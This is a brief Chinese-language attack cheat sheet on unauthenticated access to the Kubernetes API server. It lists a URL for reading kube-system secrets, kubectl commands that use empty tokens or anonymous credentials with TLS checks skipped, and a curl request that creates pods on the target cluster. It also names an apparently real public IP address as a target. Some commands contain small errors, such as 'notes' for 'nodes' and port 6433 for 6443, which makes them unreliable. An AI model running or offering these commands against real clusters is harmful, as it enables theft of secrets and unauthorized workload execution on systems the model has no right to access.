Kubernetes 概述

常见风险

Kubernetes API-Server 未授权

Kubernetes API Server提供HTTP的两个端口:8080,6443。insecure-port: 默认端口8080,在HTTP中没有认证和授权检查。secure-port :默认端口6443, 认证方式,令牌文件或者客户端证书

https://x.x.x.x:6443/api/v1/namespaces/kube-system/secrets/
secrets.png

kubectl -s https://x.x.x.x:6433/ get notes --all-namespaces=true --token="" --insecure-skip-tls-verify 

kubectl --insecure-skip-tls-verify -s https://x.x.x.x:6443/ get pods --all-namespaces=true --username=system --password=anonymous

curl -k https://x.x.x.x:6443/api/v1/namespaces/default/pods -X POST --header 'content-type: application/yaml' --data-binary @k8s.yaml

api/v1/namespaces/
https://3.10.120.235:8001/api/v1/namespaces/default/pods